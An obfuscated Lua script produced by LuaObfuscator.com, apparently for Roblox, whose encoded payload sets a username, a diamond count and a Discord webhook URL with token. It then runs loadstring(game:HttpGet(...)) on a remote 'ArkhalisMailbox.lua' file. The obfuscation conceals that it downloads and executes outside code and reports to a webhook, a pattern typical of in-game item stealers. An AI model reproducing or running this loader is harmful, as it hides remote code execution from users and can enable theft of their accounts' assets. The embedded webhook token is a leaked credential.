--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v88=0;local v89;while true do if (v88==1) then return v89;end if (v88==0) then v89=v5(v83,v19);v19=nil;v88=1;end end else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -(1 + 0))) -(v32-(620 -((1432 -(282 + 595)) + 64)))) + 1)) ;return v84-(v84%(932 -(857 + 74))) ;else local v85=2^(v32-(569 -(367 + 201))) ;return (((v31%(v85 + v85))>=v85) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0;local v36;local v37;while true do if (v35==(1637 -(1523 + 114))) then v36,v37=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;v35=1066 -(68 + 997) ;end if (v35==1) then return (v37 * ((6644 -5118) -(226 + (1161 -(32 + 85))))) + v36 ;end end end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (1==v38) then return (v42 * (16441815 + 335401)) + (v41 * (14533 + 51003)) + (v40 * (1213 -(892 + 65))) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + (15 -11) ;v38=1 -0 ;end end end local function v24()local v43=(3963 -3011) -(802 + 150) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(2 -1)) then v46=1 -0 ;v47=(v20(v45,1 + 0 ,1017 -(915 + 82) ) * ((5 -(2 + 1))^(19 + 13))) + v44 ;v43=2 -0 ;end if (v43==((4333 -3146) -(1069 + 118))) then v44=v23();v45=v23();v43=2 -1 ;end if (v43==(6 -3)) then if (v48==(0 + 0)) then if (v47==0) then return v49 * (0 -0) ;else v48=1 + 0 ;v46=(2808 -2017) -(368 + 423) ;end elseif (v48==(6433 -4386)) then return ((v47==(18 -(10 + 8))) and (v49 * ((3 -2)/0))) or (v49 * NaN) ;end return v8(v49,v48-(1465 -(416 + 26)) ) * (v46 + (v47/((6 -4)^(23 + 29)))) ;end if (v43==(3 -1)) then v48=v20(v45,(1318 -(814 + 45)) -(145 + (721 -428)) ,461 -(44 + 386) );v49=((v20(v45,1518 -(998 + 488) )==(1 + 0)) and  -(1 + 0)) or (773 -(11 + 190 + 571)) ;v43=1141 -(116 + 1022) ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v67=886 -(261 + 624) , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==(1561 -(120 + 1439))) then v58=nil;v59=nil;v53=3;end if (v53==(1785 -(599 + 1185))) then v56=nil;v57=nil;v53=1 + 1 ;end if (0==v53) then v54=0;v55=nil;v53=1 + 0 ;end if (v53==(577 -(507 + 67))) then v60=nil;while true do local v90=0;while true do if (v90==1) then if (v54==(1752 -(1013 + 736))) then for v100=1,v23() do v56[v100-1 ]=v28();end return v58;end if (v54==(2 + 0)) then local v97=0 -0 ;while true do if (v97==1) then for v116=3 -2 ,v23() do local v117=0;local v118;local v119;while true do if (v117~=0) then else v118=867 -(550 + 317) ;v119=nil;v117=1;end if (v117~=1) then else while true do if (v118==0) then v119=v21();if (v20(v119,1,1)~=0) then else local v205=0 -0 ;local v206;local v207;local v208;local v209;while true do if (0==v205) then v206=0 -0 ;v207=nil;v205=2 -1 ;end if (v205~=(286 -(134 + 151))) then else v208=nil;v209=nil;v205=1667 -(970 + 695) ;end if (v205~=(3 -1)) then else while true do if (v206==0) then local v213=0;while true do if (v213==0) then v207=v20(v119,1992 -(582 + 1408) ,3);v208=v20(v119,13 -9 ,6);v213=1;end if (v213~=1) then else v206=1;break;end end end if (v206==(1 -0)) then local v214=0 -0 ;local v215;while true do if ((1824 -(1195 + 629))==v214) then v215=0;while true do if (v215==0) then local v225=0;while true do if ((1 -0)==v225) then v215=1;break;end if (v225~=0) then else v209={v22(),v22(),nil,nil};if (v207==(0 + 0)) then local v226=0;local v227;local v228;local v229;while true do if (v226~=(1 + 0)) then else v229=nil;while true do if (v227==(1 -0)) then while true do if ((0 -0)==v228) then v229=0;while true do if (v229==(0 + 0)) then v209[1639 -(1373 + 263) ]=v22();v209[4]=v22();break;end end break;end end break;end if (v227~=(1000 -(451 + 549))) then else v228=0 + 0 ;v229=nil;v227=1 -0 ;end end break;end if (v226~=(0 -0)) then else v227=0;v228=nil;v226=1;end end elseif (v207==(1385 -(746 + 638))) then v209[2 + 1 ]=v23();elseif (v207==2) then v209[3]=v23() -((2 -0)^(357 -(218 + 123))) ;elseif (v207~=(1584 -(1535 + 46))) then else local v232=0;local v233;while true do if (v232==0) then v233=0 + 0 ;while true do if (v233~=0) then else v209[1 + 2 ]=v23() -((562 -(306 + 254))^(1 + 15)) ;v209[7 -3 ]=v22();break;end end break;end end end v225=1468 -(899 + 568) ;end end end if (1==v215) then v206=2;break;end end break;end end end if (v206==3) then if (v20(v208,3,3)==1) then v209[4]=v60[v209[4]];end v55[v116]=v209;break;end if (v206==2) then local v217=0 + 0 ;while true do if (v217==0) then if (v20(v208,2 -1 ,604 -(268 + 335) )~=(291 -(60 + 230))) then else v209[2]=v60[v209[2]];end if (v20(v208,574 -(426 + 146) ,2)==1) then v209[1 + 2 ]=v60[v209[3]];end v217=1457 -(282 + 1174) ;end if ((812 -(569 + 242))==v217) then v206=3;break;end end end end break;end end end break;end end break;end end end v54=8 -5 ;break;end if (v97==0) then for v120=1,v59 do local v121=0 + 0 ;local v122;local v123;local v124;local v125;while true do if (v121==0) then v122=0;v123=nil;v121=1;end if (v121==1) then v124=nil;v125=nil;v121=1026 -(706 + 318) ;end if (v121==2) then while true do if (v122~=(1251 -(721 + 530))) then else v123=1271 -(945 + 326) ;v124=nil;v122=1;end if (v122~=(2 -1)) then else v125=nil;while true do if (0~=v123) then else local v210=0;local v211;while true do if (v210==0) then v211=0 + 0 ;while true do if (v211==0) then local v218=0;while true do if (v218~=(700 -(271 + 429))) then else v124=v21();v125=nil;v218=1 + 0 ;end if (v218==(1501 -(1408 + 92))) then v211=1;break;end end end if (v211~=(1087 -(461 + 625))) then else v123=1;break;end end break;end end end if (v123==(1289 -(993 + 295))) then if (v124==(1 + 0)) then v125=v21()~=(1171 -(418 + 753)) ;elseif (v124==(1 + 1)) then v125=v24();elseif (v124==(1 + 2)) then v125=v25();end v60[v120]=v125;break;end end break;end end break;end end end v58[1 + 2 ]=v21();v97=1 + 0 ;end end end break;end if ((529 -(406 + 123))~=v90) then else if (v54==(1770 -(1749 + 20))) then local v98=0 + 0 ;while true do if (v98==(1323 -(1249 + 73))) then v60={};v54=1 + 1 ;break;end if (v98~=0) then else v58={v55,v56,nil,v57};v59=v23();v98=1;end end end if (v54~=(0 -0)) then else local v99=1900 -(106 + 1794) ;while true do if (v99==(0 + 0)) then v55={};v56={};v99=1 + 0 ;end if (1==v99) then v57={};v54=1;break;end end end v90=2 -1 ;end end end break;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v86=0,v77 do if (v86>=v71) then v75[v86-v71 ]=v76[v86 + 1 ];else v79[v86]=v76[v86 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v87=0;while true do if (v87==1) then if (v82<=4) then if (v82<=1) then if (v82>0) then do return;end else local v102=v81[2];v79[v102]=v79[v102](v13(v79,v102 + 1 ,v74));end elseif (v82<=2) then v79[v81[2]]();elseif (v82>3) then local v126=0;while true do if (v126==9) then v79[v81[2]][v81[3]]=v81[4];break;end if (v126==0) then v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v126=1;end if (v126==7) then v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v126=8;end if (v126==4) then v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v126=5;end if (3==v126) then v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v126=4;end if (v126==1) then v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v126=2;end if (v126==6) then v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v126=7;end if (5==v126) then v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v126=6;end if (v126==8) then v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v126=9;end if (v126==2) then v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v126=3;end end else local v127=0;local v128;local v129;local v130;local v131;while true do if (v127==0) then v128=v81[2];v129,v130=v72(v79[v128](v13(v79,v128 + 1 ,v81[3])));v127=1;end if (v127==1) then v74=(v130 + v128) -1 ;v131=0;v127=2;end if (v127==2) then for v200=v128,v74 do v131=v131 + 1 ;v79[v200]=v129[v131];end break;end end end elseif (v82<=6) then if (v82==5) then local v104=0;local v105;local v106;local v107;local v108;local v109;while true do if (v104==7) then v109=v81[2];v79[v109]=v79[v109](v13(v79,v109 + 1 ,v74));v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]();break;end if (v104==0) then v105=nil;v106,v107=nil;v108=nil;v109=nil;v79[v81[2]][v81[3]]=v81[4];v104=1;end if (v104==4) then v108=v79[v81[3]];v79[v109 + 1 ]=v108;v79[v109]=v108[v81[4]];v73=v73 + 1 ;v81=v69[v73];v104=5;end if (3==v104) then v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v109=v81[2];v104=4;end if (v104==2) then v79[v81[2]][v81[3]]=v81[4];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v104=3;end if (v104==6) then v74=(v107 + v109) -1 ;v105=0;for v168=v109,v74 do local v169=0;while true do if (v169==0) then v105=v105 + 1 ;v79[v168]=v106[v105];break;end end end v73=v73 + 1 ;v81=v69[v73];v104=7;end if (1==v104) then v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v104=2;end if (v104==5) then v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v109=v81[2];v106,v107=v72(v79[v109](v13(v79,v109 + 1 ,v81[3])));v104=6;end end else local v110=0;local v111;local v112;while true do if (0==v110) then v111=v81[2];v112=v79[v81[3]];v110=1;end if (v110==1) then v79[v111 + 1 ]=v112;v79[v111]=v112[v81[4]];break;end end end elseif (v82<=7) then v79[v81[2]]=v81[3];elseif (v82==8) then v79[v81[2]][v81[3]]=v81[4];else v79[v81[2]]=v63[v81[3]];end v73=v73 + 1 ;break;end if (v87==0) then v81=v69[v73];v82=v81[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!113O0003023O005F4703083O00557365726E616D6503083O00726962692O73717703083O004469616D6F6E6473024O002O841E4103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31303236373532303234302O3537363O372F4B5F4B38327335785544414F49445438684D59503571595135775F61316C6F6C434F7063574E79684B4A4B56547247456C4976485841756B7561385259655F726C394F7A2O033O004B6579034O00030F3O00576562682O6F6B4475616C482O6F6B030D3O004C6F6164696E675363722O656E026O00F03F030A3O005363726970744E616D65030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403313O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F782E6C756100163O0012043O00013O00304O0002000300124O00013O00304O0004000500124O00013O00304O0006000700124O00013O00304O0008000900124O00013O00304O000A00090012093O00013O0030053O000B000C00124O00013O00304O000D000900124O000E3O00122O0001000F3O00202O00010001001000122O000300116O000100039O0000026O000100012O00013O00017O00",v9(),...);end